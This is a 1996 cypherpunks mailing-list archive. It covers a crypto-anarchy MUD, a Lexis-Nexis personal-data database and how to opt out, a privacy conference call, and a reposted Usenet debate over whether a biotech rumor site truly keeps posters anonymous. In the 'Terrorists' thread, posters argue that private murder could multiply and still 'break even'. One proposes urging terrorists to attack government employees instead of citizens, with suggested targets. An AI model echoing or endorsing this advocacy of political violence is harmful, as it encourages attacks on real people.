http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jon Leonard" <jleonard@divcom.umop-ap.com>
Date: Tue, 10 Sep 1996 15:49:22 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto Anachy MUD
In-Reply-To: <2.2.32.19960909183805.008b9c70@panix.com>
Message-ID: <9609100510.AA06806@divcom.umop-ap.com>
MIME-Version: 1.0
Content-Type: text


Duncan Frissell wrote:
> Did anyone make the point (I gave up on the thread) that we already have a
> great Crypto Anarchy MUD with lots of the coding already done.  We call it
> the Internet.  Digital cash, strong crypto, remailers, everything.

Tim May expressed doubt that it was worth the effort:  Not much easier
than the real thing, and not as good.  That's the closest to your point,
I think.

> I have never been able to figure out why anyone would want to play games on
> a computer in any case when the whole system is a game.  Word processing,
> spreadsheets, telecoms -- it's all a game.  And they pay you to play it.

I've never figured out why anyone would play games at all -- the whole
universe is all a game too.

For whatever reason, some people (including me) like to play games.  I've
been working on a MUD anyway, and the question is whether it would be
interesting enough to add crypto-anarchy aspects to it to be worth the
effort.  Obviously you think not.

There are a few significant differences:

We don't have fully anonymous digital cash, and not everyone can issue it.
Strong crypto isn't universally deployed.
Remailers don't allow easy two-way traffic.
Few employers are willing to pay pseudonymous entites.
You don't get imprisioned or killed for too-risky behavior on a MUD.
Running a MUD invites less unwelcome attention than do some of the services
discussed on cypherpunks.

Finally, a MUD has the potential to spread crypto-anarchic ideas to people
who would not otherwise have considered them.

It may be that I'm wasting my time, but I could come up with some useful
new crypto protocol too.

> DCF

Jon Leonard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 10 Sep 1996 15:03:29 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: SPL -- Suspicious Persons List
In-Reply-To: <ae59b08c16021004b99b@[207.167.93.63]>
Message-ID: <Pine.LNX.3.93.960909222327.544C-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Sep 1996, Timothy C. May wrote:

> Digitaltronics Corporation V.P of Human Relations: "Joe, thanks for coming
> in this morning. I'm sure you're busy, so I'll make this as short as
> possible. OK with you?"
> Suspicious Persons List, and there's just nothing we can do about it. We
> just can't have our corporate image linked to persons on the SPL. Now, Joe,
> you'll get a generous 6 weeks of severance pay, and Daphne will assist you
> with your outplacement processing. Of course, Joe, you will have to go
> through an inspection every morning until you're fully processed...there's
> that SPL matter, you know." <laughs>
> JS: "Uh..."

     In this case I wouldn't bother with Mr. Bell's solution. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 10 Sep 1996 14:40:04 +0800
To: cypherpunks@toad.com
Subject: Re: Conjuring up the latest utopia for a minoritarian sect of illumin
In-Reply-To: <ae59868c13021004db98@[207.167.93.63]>
Message-ID: <maq1TD76w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> Yes, Bosnians and Serbs would not be killing each other if only they could
> receive government-approved information!

Why yes - they wouldn't have re-started killing each other (after a brief
hiatus of about 50 years) if they had access to mass media other than the
gov't controlled TV, compared to which even CNN is almost impartial.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 10 Sep 1996 16:31:17 +0800
To: Duncan Frissell <cypherpunks@toad.com
Subject: Re: [WAS xs4all.nl] Terrorists
Message-ID: <199609100549.WAA22794@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:29 PM 9/9/96 -0400, Duncan Frissell wrote:
>At 01:49 AM 9/9/96 -0700, Timothy C. May wrote:
>>And the net effect of crypto anarchy is to destabilize and marginalize
>>central governments, which is a net positive effect. If some eggs get
>>broken in the process, the biological imperative will generate more eggs.
>>No big deal.
>
>Particularly since governments murdered 160 million in the last 100 years
>while we civilians have only managed to murder a paltry 20 million or fewer.
>A savings of 160 million deaths leaves a lot of room for a non-harmful
>increase in private murder.  We could increase the private murder rate by 8
>to 10 times and still break even. 

I think the analysis is even more attractive than these numbers would imply. 
  Probably the victims of government were, on average, no more "worthy of 
death" than that of the average citizen.  They were the soldiers killed in 
wars (many or most of whom were drafted), civilians bombed, the victims of 
oppression and holocaust, etc.  More or less ordinary people, a 
cross-section of society.

While it's harder to generalize about victims of private killing, probably a 
far higher probability were either the bad guys killed off by other bad 
guys, or the bad guys killed legitimately by the good guys.  Even when they 
were "good guys killed by bad guys," in many cases it's due to fallout from 
drug laws, or people prevented from carrying guns for their own protection.  


>Note too that most terrorism is aimed at governments (even if practiced on
>civilians).  In the absence of government, terrorist incentives may be 
reduced.

Normally efforts to reduce terrorism would be welcomed by the government.  
Wouldn't it be interesting to see their reaction to an organization which 
announces that there are too many innocent citizens who are becoming victims 
of terrorism, and publicly calls on these terrorists to direct their attacks 
to non-private individuals, possibly researching the matter and giving 
suggestions?

I think the public would understand, after a little education, that the 
average terrorist doesn't really have any reason to want to kill a private 
citizen if a better alternative were presented.  I don't suppose you'd ever 
see a conventional polling organization ask the public questions like, 
"would you prefer to see 200+ randomly-selected citizens die in an airplane 
bombing, or the deaths of 50 government employees most responsible for the 
Waco and Ruby Ridge incidents."



 

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 10 Sep 1996 14:23:54 +0800
To: cypherpunks@toad.com
Subject: Re: ... subversive leftists
In-Reply-To: <ae59b6a31802100427f6@[207.167.93.63]>
Message-ID: <73q1TD77w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> As to "tasteless and insulting," a matter of personal perspective. I find
> it helpful to call a spade a spade, and others apparently do as well.
>

Of course, Tim gets very uncomfortable when others call a spade a spade.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DAVID A MOLNAR <molnard1@nevada.edu>
Date: Tue, 10 Sep 1996 18:43:28 +0800
To: jbugden@smtplink.alis.ca
Subject: RE: What is the EFF doing exactly?
In-Reply-To: <9608098423.AA842308610@smtplink.alis.ca>
Message-ID: <Pine.OSF.3.91.960909225203.15606B-100000@pioneer.nevada.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 9 Sep 1996 jbugden@smtplink.alis.ca wrote:

> This may be a hopelessly naive question, but is it possible to refuse payment in
> cash? Is it really good for all debts public and private?
> 
> James
	I think this was mentioned a while back. If I recall correctly, a 
business may not refuse cash for a debt already incurred, but may refuse 
to allow you to incur said debt. That is, while cash is legal tender, a 
business may still refuse it, on the principle that they may not be 
compelled to provide service to any person or class of persons. In this 
case, class of persons == those w/cash. 

So, no, if you already had a contract or obligation, they may not refuse 
payment in cash. They may try. However, walking up to a store counter or 
a FedEx depot is a different matter. One only has to wonder about 
restaurants which want to refuse cash...do you pay before eating, then? 
Ask for proof of credit before opening service? 

So far as I think...

-David Molnar





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 10 Sep 1996 14:16:08 +0800
To: cypherpunks@toad.com
Subject: Re: [WAS xs4all.nl] Terrorists
In-Reply-To: <Pine.LNX.3.93.960909131337.1028P-100000@smoke.suba.com>
Message-ID: <0DR1TD79w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


snow <snow@smoke.suba.com> writes:

> On Mon, 9 Sep 1996, Stephan Schmidt wrote:
>
> > One thought : How many of you would support terrorist
> > web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ?
>
>      If Iran, the IRA, etc. wanted to pay me to host a web page that
> described their goals and methods, I would.
>
>      I believe in free speach, and that means even if I disagree.
>
>      Then again, the only reason I am not a terrorist is that the government
> hasn't YET defined hate speach directed against the government to be
> terrorism.

You're not talking about the fascist U.S. gubment, are you?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 10 Sep 1996 15:05:37 +0800
To: cypherpunks@toad.com
Subject: Re: [WAS xs4all.nl] Terrorists
In-Reply-To: <2.2.32.19960909182912.008bf55c@panix.com>
Message-ID: <TiR1TD81w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell <frissell@panix.com> writes:
> And I support a terrorist organization (the US Government) every year
> whether I want to or not.  The US was convicted of a major violation of
> international law (akin to terrorism) in the International Court of Justice
> back in the '80s for air sowing mines in Nicaragua's main harbor.

The U.S. committed heinous war crimes (on par with Nazi Germany) in Korea,
Viet Nam, Nicaragua, Panama, Grenada, Iraq, and many other countries.

President Clinton is a bloodthirsty terrorist, guilty of murder, high treason,
and other capital crimes.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 10 Sep 1996 14:24:37 +0800
To: cypherpunks@toad.com
Subject: RRE: Lexis-Nexis personal information database
Message-ID: <01I9AIVKYUFO9ULM12@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	One wonders exactly how much of this information is compiled from
government-generated sources? The SSN is automatically originally
government-derived, of course...
	-Allen

From:	IN%"rre@weber.ucsd.edu"  7-SEP-1996 02:02:07.36

[Excerpt from Privacy Forum 5.17.]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Tue, 3 Sep 96 12:01 PDT
From: privacy@vortex.com (PRIVACY Forum)
Subject: PRIVACY Forum Digest V05 #17

PRIVACY Forum Digest      Tuesday, 3 September 1996      Volume 05 : Issue 17

-----------------------------------------------------------------------------

Date:    Tue, 3 Sep 1996 11:22:15 -0400 (EDT)
From:    Larry Hunter <hunter@intr.net>
Subject: Lexis-Nexis personal information database

Lexis-Nexis sells a commercial database called "Ptrax" which holds detailed
personal information on nearly all Americans (L-N claims it contains 300
million names).  This database includes name, current address, up to two
previous addresses, phone number, birth-date, social security number,
mother's maiden name and possible other personal information.  This database
is kept quite current.  Through the Nexis Express service, this information
could be available to any individual with a credit card.

As most readers will are aware, such information could easily be used for
theft of identity and other frauds.  It is possible to have one's name
removed from this database by making a telephone request.  Call
(800)543-6862, select option 4 ("all other questions") and tell the
representative answering that you wish to remove your name from the Ptrax
database.  You may also send a fax to (513)865-7360, or physical mail to
LEXIS-NEXIS / P.O. Box 933 / Dayton, Ohio 45401-0933.  Sending physical mail
to confirm your name has been removed is always a good idea.

As word of the existence of this database has spread on the net, Lexis-Nexis
has been inundated with calls, and has set up a special set of operators to
handle the volume.  In addition, Andrew Bleh (rhymes with "Play") is a
manager responsible for this product, and is the person to whom complaints
about the service could be directed.  He can be reached at the above 800
number, selection option 4 and then ask for extension 3385.

The information in this note has been been confirmed by me, and was
originally provided in forwarded messages from Russell Whitaker, Jason
Werner, Vern Winters, Katherine Florman and Reuben Snipper.

Larry Hunter
hunter@intr.net

------------------------------

End of PRIVACY Forum Digest 05.17
************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 10 Sep 1996 14:25:21 +0800
To: cypherpunks@toad.com
Subject: RRE: Computers, Freedom, and Privacy
Message-ID: <01I9AIWML6889ULM12@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"rre@weber.ucsd.edu"  7-SEP-1996 07:46:46.51

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Tue, 3 Sep 1996 12:37:14 -0700 (PDT)
From: Bruce R Koball <bkoball>

   THE SEVENTH CONFERENCE ON COMPUTERS, FREEDOM, AND PRIVACY

                Call for Participation

        San Francisco Airport Hyatt Regency Hotel
                Burlingame, California
                   March 11-14, 1997

CFP97: Commerce & Community will be sponsored by the Association for
Computing Machinery SIGCOM and SIGSAC. The host institutions will be
Stanford University and the University of California at Berkeley.
Co-sponsors and cooperating organizations include the ACM SIGCAS, the
Electronic Frontier Foundation, the Center for Democracy and
Technology, the Electronic Privacy Information Center, and the WELL.

CFP97: Commerce & Community is the latest in a series of annual
conferences assembling a diverse group of experts and advocates from
the domains of technology, business, government, and academia to
explore the evolution of information and communication technologies and
public policy, and its effects on freedom and privacy in the United
States and throughout the world.

Past CFP sessions have discussed, debated -- and often anticipated --
issues of great social import.  In this tradition, CFP97: Commerce &
Community will examine the social and policy questions posed by:

* the growth of electronic communities;
* electronic commerce and the commercialization of cyberspace;
* the problems of legal and regulatory control of the Net;
* the interests of privacy and property in the electronic domain;
* high-tech law enforcement and security concerns.

The CFP97 Program Committee invites your suggestions for presentations
on these or other important issues at the nexus of technology,
business, public policy, freedom, and privacy.

Proposals may be for individual talks, panel discussions, debates, moot
courts, moderated, interactive sessions or other formats.  Each
proposal should be accompanied by a one-page statement describing the
topic and format.  Descriptions of multi-person presentations should
include a list of proposed participants and session chair.  Proposals
should be sent by email to cfp97@cfp.org. If necessary, typewritten
proposals may be sent to: CFP'97, 2210 Sixth Street, Berkeley, CA
94710.

Please submit your proposal as soon as possible.  The deadline for
submissions is October 1, 1996.  (Please note that we have extended our
deadline for submissions)

For more information on the Computers, Freedom and Privacy Conferences,
as well as up-to-date announcements on CFP'97, please visit our Web
page at:   http://www.cfp.org

cfp97_call v1.2





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 10 Sep 1996 15:38:25 +0800
To: cypherpunks@toad.com
Subject: Anonymity thread from sci.research.careers
Message-ID: <H2R1TD82w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Recently I noticed an interesting thread on the Usenet newsgroup s.c.r
regarding a Web site with a conferencing system, supposedly anonymous.
I repost several articles which some folks on cp might find interesting.

Path: !howland.erols.net!news2.digex.net!access1.digex.net!arthures
From: "Arthur E. Sowers" <arthures@access.digex.net>
Newsgroups: sci.research.careers
Subject: Review and Warning about the "Biotech Rumor Mill"
Date: Mon, 2 Sep 1996 22:16:39 -0400
Organization: Express Access Online Communications, USA
Lines: 114
Message-ID: <Pine.SUN.3.94.960902214715.17927F-100000@access1.digex.net>
References: <lindasj-2908961456130001@client9.sedona.net>
NNTP-Posting-Host: access1.digex.net
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Sender: arthures@access1.digex.net
In-Reply-To: <lindasj-2908961456130001@client9.sedona.net>


Folks, I decided to visit this web site and tell all of you a few things
you ought to keep in mind.

First, the review: Yes, the "Rumor Mill" is a sort-of web-site
"newsgroup". The majority of posts and responses that I saw (not counting
the archives) were by "anonymous" posters. A good many were not
particularly "hot" (such as "why is company 'X' stock dropping?" and some
inane comments). Some were cryptic (meaning to the average person, they
might be essentially meaningless). Most were very short (1-2 sentences). A
few posts did have some information that I downloaded for use later. One
or two mentioned lawsuits (patent infringement).

Second, the warning: The Rumor Mill lets you post anonymously (as far as I
could see, but I did not try it) but THAT DOES NOT MEAN THAT SOMEONE WILL
NOT KNOW WHO YOU ARE. I don't know how the Rumor Mill is operated, but I
do know that websites CAN be configured to capture information about
browser users who access that site! They can get a large amount of
information about you including your name, email address, all sorts of
information about your domain & ISP, etc. Your anonymous post may appear
to everyone else as anonymous, but the sysop (webmaster) at that site
should be presumed to be capable of determining who you are. I myself have
seen website "hit statistics" and believe me, it all shows up. You should
look in your Web Browser directory for the <cookies.txt> file and note
that some web sites that you visit will put short lines of data into your
file. You might try to change the attributes on that file to "read only"
and see what happens. Sometimes it will thwart the web site, sometimes it
will give you an error message. As a matter of fact, I did click on one
button and my netscape security window opened up to warn me that the
channel to that site was not secure. What else is related to this? There
are a number of anonymous remailers out in cyberspace, but it has been
stated by a knowledgeable source that a number of them are being operated
by law enforcement agencies (presumably to troll for criminal activity). A
website which allows rumors to be posted anonymously, especially involving
commercial business details (i.e. proprietary) but carries at least
no disclaimer that the sysop or sponsors do not use hit statistics data
to correlate it with anonymous posters and thereby determine or attempt to
determine thier identity is a website that I would avoid using. In the
worlds of politics, leaks, trial-baloons, rumor, inuendo, insinuations,
etc. are common and make for entertaining reading for those who enjoy it.
But in the world of commerce, the wrong blip in the wrong place can lead
to lawsuits, prosecution (by, for example, the Securities and Exhange
Commission), and other personal information, identity, etc., to fall into
hands that I would hope smart people might think about before they make
posts. I have the feeling that a simple post to a newsgroup through a
remailer would be safer that an anonymous post to the Rumor Mill. At
least, I would get into the configuration dialog boxes on your web browser
and leave "your name" and "your email address" blank, or put in a dummy
name. But then, you can figure out that this is a way to also send forged
mail (there was a "fake mail" website about a year or two ago, but the
sysops eventually shut it down). There is in fact a website out there that
says it can be used for anonymous web browsing (and I expect at some time
in the future that they will start charging for its use [think for a
minute why these would exist and it will be obvious]), but where I have
that little snit of paper is burried on my desk with mountains of
uncolated paperwork (sorry).

What dothey say about "buyer beware?" Caveat emptor?

Eh?

Art Sowers


=======
On 29 Aug 1996, Linda St. James wrote:

> Do you want to have a little fun and perhaps learn something about the
> current state of the biotechnology industry?
>
> Have you a particular company you've been interested in that you'd like
> more information on -- but the "inside scoop" seems better than an
> official company profile?
>
> IF SO ---
>
>
> Please take a look at Dr. Martin Leach's BIOTECH RUMOR MILL, one of the
> most fascinating sites on the WWW for the biotechnologist.
>
> In this site, Martin goes to great lengths to have an "all in one
> location" center for biotechnology news. Whether it is the daily reports
> from PR Newswire, or his reader surveys, you are bound to find something
> of interest. But, to prove that the internet imitates real life, some of
> the most interesting tidbits are pure rumor.
>
> In this site, you and your colleagues have an opportunity to post
> information in a completely anonymous fashion. Some of the biggest news in
> the biotechnology business comes out of the "Rumor Mill" before it hits
> the trade journals, or even the Wall Street Journal! Of course, you have
> to remember that in any forum where anyone can post anonymously, there is
> a certain amount of frivolity as well. But what fun!
>
> Search Masters International, an industry-leading search firm specializing
> in Biotechnology, Pharmaceuticals, and Medical Device industries, is now a
> sponsor of this site along with Research Diagnostics.
>
> Take a look at your earliest convenience:
>
> The Biotech Rumor Mill is at: http://www.tradesmart.com/rumor
>
> The Search Masters International home page is at: http://smi.bio.com/
>
> Best regards,
>
> Linda St. James, Office Manager
> Search Masters International
> Five Hundred Foothills South, Suite #2
> Sedona, AZ 86336
> (520) 282-3553 Phone or (520) 282-5881 Fax
> email to lindasj@sedona.net
>
>

Path: !howland.erols.net!news2.digex.net!access5.digex.net!arthures
From: "Arthur E. Sowers" <arthures@access.digex.net>
Newsgroups: sci.research.careers
Subject: Re: Review and Warning about the "Biotech Rumor Mill"
Date: Tue, 3 Sep 1996 13:59:21 -0400
Organization: Express Access Online Communications, USA
Lines: 89
Message-ID: <Pine.SUN.3.94.960903133225.2947A-100000@access5.digex.net>
References: <lindasj-2908961456130001@client9.sedona.net> <Pine.SUN.3.94.960902214715.17927F-100000@access1.digex.net> <davej-0309960723220001@client12.sedona.net>
NNTP-Posting-Host: access5.digex.net
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Sender: arthures@access5.digex.net
In-Reply-To: <davej-0309960723220001@client12.sedona.net>



On 3 Sep 1996, Dave Jensen wrote:

> In article <Pine.SUN.3.94.960902214715.17927F-100000@access1.digex.net>,
> "Arthur E. Sowers" <arthures@access.digex.net> wrote:

"Nice" of you to delete ALL of my post instead of dealing with the
specific issues, or CONSIDERING that I might have some valid points.

>
> Art you have gone off the deep end.
>
> Yes, let's now add web site reviews and critiques to your mix of strange
> posts. Personally, I think you miss the whole point of Martin's rumor mill
> site, and it is obvious that you didn't read the webmaster's introduction
> of how he handles anonymity.

I returned to that website a few minutes ago to look over "how he handles
anonymity" and nothing in what he said negates the possibility that he
(and, by extension, can share "inteligence" information about the source
of the rumor and maybe even the identity of the poster). You can have him
look at his web hit statistics and he will find my "visit" listed (or at
least he should be able to find it, as I did not go to the site
"cloaked"). As a matter of fact, the wording of the disclaimers (at
.../rumor/post.html) is that "All correspondees identities will be kept
confidential." which says to me that he (and you?) may "keep" them
confidential (i.e. you may know them, even though you may not broadcast
them all over the net, and that may give you some valuable insight into
who says what and when). He says at another point "..., an email is sent
directly to me and a message is appended to the Rumor Mill." As far as I
am concerned, if you go over to the anonymous newsgroups and read about
privacy (and get the help file from Julf Helsigius' anon remailer) ANY
sysop can read any mail that comes through a sysop's site. And, if I were
in a private business, I would see the temptation to "use" that
information being just as strong as governments all over the world justify
having their own CIAs, NSAs, KGBs, etc., and just as strong as many
corporations have their own "intelligence" activities, reverse engineering
departments, and private security and investigation units. If you go to
any good sized public library and look up under industrial espionage and
spying, you will get many books on this. You can try to pull the wool over
most of the eyes around here, but it ain't gonna work with me. You would
also be advised to work with Martin to rephrase some of his language. He
says at another point in a page that "This site is for entertainment
purposes only." Hell, thats crap. If I go looking for such gossip and
rumors, its because it deals with something that impacts on my life, my
job, my career and it better be good poop!

Besides, on the esthetics, virtually every (EVERY) post that I clicked on
had this overly obvious "Proudly Sponsored by -- SMI" box plastered right
on the top. Then right under it is the RDI box.  Man, can't you guys show
a little "class" and just have this showing just once on the home page and
cut out all the repetition? It turns me off.

And, you should have thanked me for NOT mentioning all the posts that are
now archived that reported problems hitting your SMI site (I didn't read
more than one or two of them).

> Stick to what you know, Art, which appears to me to be academic career
> tracks. No one has ever disputed your commentary in that area. But, like
> the restaurant reviewer who thinks he now knows enough about entertainment
> to review opera, you have gone over the edge and into territory better
> left for those who, like Dr. Martin Leach, really know how to provide
> value on the WWW.

Your opinion, as usual. But for the rest of you out there, think twice
about posting an "anonymous" message to a web site. I've been on the other
end of them, and I know that people sit around trying to figure out as
much as possible about who its from if they don't get an email identity.

Or... how, Dave, would you like it if I tried to go in and put a warning
to visitors to that site? Would you and or Martin "censor" my post? After
all, at another place on the website is the statement that "I am not
responsible for the accuracy of this information although I try to confirm
where possible." I know that many "service providers" openly state that
they reserve the right to decline or terminate service to any subscriber
for any reason at any time. Martin could be in a little "free speech"
trouble and you and he might get together (since you are sponsoring, too,
and therefore "calling the tune") and talk about this.

I should send you a bill for consulting time on this, actually.

>
> Dave
>
>

Art Sowers

Path: !howland.erols.net!news2.digex.net!access2.digex.net!arthures
From: "Arthur E. Sowers" <arthures@access.digex.net>
Newsgroups: sci.research.careers
Subject: Re: Review and Warning about the "Biotech Rumor Mill"
Date: Wed, 4 Sep 1996 22:03:34 -0400
Organization: Express Access Online Communications, USA
Lines: 118
Message-ID: <Pine.SUN.3.94.960904214345.20399A-100000@access2.digex.net>
References: <lindasj-2908961456130001@client9.sedona.net> <Pine.SUN.3.94.960902214715.17927F-100000@access1.digex.net> <50i2rr$t6i@news.bu.edu> <Pine.PMDF.3.91.960904173108.88691A-100000@BIOMED.MED.YALE.EDU>
NNTP-Posting-Host: access2.digex.net
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Sender: arthures@access2.digex.net
In-Reply-To: <Pine.PMDF.3.91.960904173108.88691A-100000@BIOMED.MED.YALE.EDU>



On Wed, 4 Sep 1996 mmartin@BIOMED.MED.YALE.EDU wrote:

> About the Biotech Rumor Mill - I think it is a very cool idea. Really, I
> do. I have some doubts about the duplicity of the statement *for
> entertainment purposes only* but I can live with it. (It just sounds a bit
> too much like those ads on late-night TV for psychics; most of the ad is
> full of testamonials about how the service accurately predicted things and
> how it helps people by predicting events but if you look closely there is
> a small disclaimer that says *for entertainment purposes only*.  Yeah,
> right. But Martin Leach isn't charging for access, so I can live with it.)
>
> On 3 Sep 1996, Martin Leach wrote:
>
> > Hi Arthur,
> >
> > I read your initial comments to Dr. Jensen and feel that are being a little
> > paranoid.
>
> To each his own. <insert tongue in cheek> Just because you are paranoid
> doesn't mean they aren't out to get you (or so the saying goes). ha, ha.
>
> > Information can be readily collected by any adept webmaster that wishes
> > to.....so your comments are applicable to EVERY web site.
>
> Can't argue with that. But, of course, that isn't the point. The point is
> that your site (unlike the vast majority of sites) claims to protect
> anonymity. If you claim to protect anonymity, then your site should be
> held to different standards.
>
> > Just because
> > somebody clicks 'submit' on a form e.g. posting form on my site it does not
> > send any extra information that cannot be gathered any other nefarious way.
>
> I don't think Art was suggesting anything of the sort (Art, feel free to
> correct me if I'm wrong). I think he was just pointing out that it is
> possible to gather a lot of information about a poster - information that
> the poster may not be aware that he/she is giving. People (even
> scientists!) are generally unaware about how insecure electronic
> transmissions are and I think Art was just trying to raise the level of
> awareness.

Yep, that is what I had in mind. The anonymous posts may be anonymous to
everyone else, but the "masters" at that site have it in their power to
know where the post came from and who authored it and that could give them
some interesting information to be privy to. Julf Helsingius who used to
run the anon.penet remailer was a lot more honest about security and was
very upfront about this in his "help" responder. But his site is off the
air now. I could make lots of speculations but I won't. But everyone
should beware of anything which is offered for "free" by business
entities. Sometimes its a PR thing. Sometimes its genuine altruism. And
sometimes its a pure scame. I won't openly estimate here how I would
partition the fractions between those three possibilities. However, if I
were running the "Rumor Mill" I would have a lot more extensive of a
disclaimer and explanation (not only for PR but for legal purposes...I
would not want to be a party in a lawsuit to "leaked" proprietary
information... there is a fair bit of case law on this now).

> The reason your site has become a lightning rod for security/privacy
> issues is that you claim to protect anonymity. This discussion could be
> about any website, but it only seems relevant when a website claims to
> protect anonymity. I don't think it was meant to suggest that you (or
> anyone who has priveleged access to the site) would actually abuse the
> contract of anonymity, but of course you can't warn people about
> potential abuse without it looking like you think it is likely that
> people will abuse priveleges. (hope that convoluted sentence makes sense)

I know what you mean, and if those guys are smart, they will think about
this a little.

> Anyway, if I had something that could get me fired, sued, or blackballed,
> I sure wouldn't want to trust someone's claim of anonymity - especially
> since that claim is probably not legally enforcable (i.e., I couldn't sue
> the webmaster for damages if s/he made my identity known).

Well, the anon.penet service got the local Finnish authorities (i.e. the
heat) on their rear ends and that caused the whole service to terminate.
The FBI, here, has been known to just go in and confiscate the hardware
and software if they want to shut someone down for good cause. Suppose you
were a company that didn't like something. Money and lawyers can lead to
actions to stop something. I recall a year or two ago that one of the
tobbacco companies didn't like the results of a researcher which got
published and came out as anti-tobbacco. What did the company do? They
used legal manuvering to force the researcher to turn over all of his
notes, data, notebooks, manuscript drafts to the tobbacco company. How do
you like them apples? By the way, this was reported in an issue of
_Science_ back maybe 2 (?) years ago.

> This is even
> more important if that someone is intimately tied to the industry about
> which I have information! I'd be much more likely to send it through an
> anonymous remailer (even though those are no longer secure).

I'd go for plain paper, handled with gloves that had not been touched on
the outside by any of my pinkies, in an envelope, addressed and stamped
(without licking), to the Wash Post, NY Times, and FBI, if I had something
to blow the whistle about. You know, like in the spy novels written by
ex-spooks.

> Call me paranoid, if you will. But I sure as heck won't go walking in
> downtown at night with $20 bills taped all over me - I'd just be asking
> to get robbed, wouldn't I? I don't see that this is any different (except
> in degree, perhaps).

Right-on!

>
> Margaret A. Martin
>
> Yale University
> mmartin@biomed.med.yale.edu
>
>
>

Art Sowers

Path: !magnus.acs.ohio-state.edu!lerc.nasa.gov!purdue!news.bu.edu!darwin!leach
From: leach@darwin (Martin Leach)
Newsgroups: sci.research.careers
Subject: Re: Review and Warning about the "Biotech Rumor Mill"
Date: 3 Sep 1996 20:02:03 GMT
Organization: Boston University
Lines: 163
Message-ID: <50i2rr$t6i@news.bu.edu>
References: <lindasj-2908961456130001@client9.sedona.net> <Pine.SUN.3.94.960902214715.17927F-100000@access1.digex.net>
NNTP-Posting-Host: darwin.bu.edu
X-Newsreader: TIN [version 1.2 PL2]

Hi Arthur,

I read your initial comments to Dr. Jensen and feel that are being a little
paranoid.
Information can be readily collected by any adept webmaster that wishes
to.....so your comments are applicable to EVERY web site. Just because
somebody clicks 'submit' on a form e.g. posting form on my site it does not
send any extra information that cannot be gathered any other nefarious way.
The only additional information they send is whatever they fill in the
dialog boxes.

an example of info-gathering that can be acheived by any webmaster can be
found at:

http://www.uiuc.edu/cgi-bin/info

together with the web browser + privacy issue.


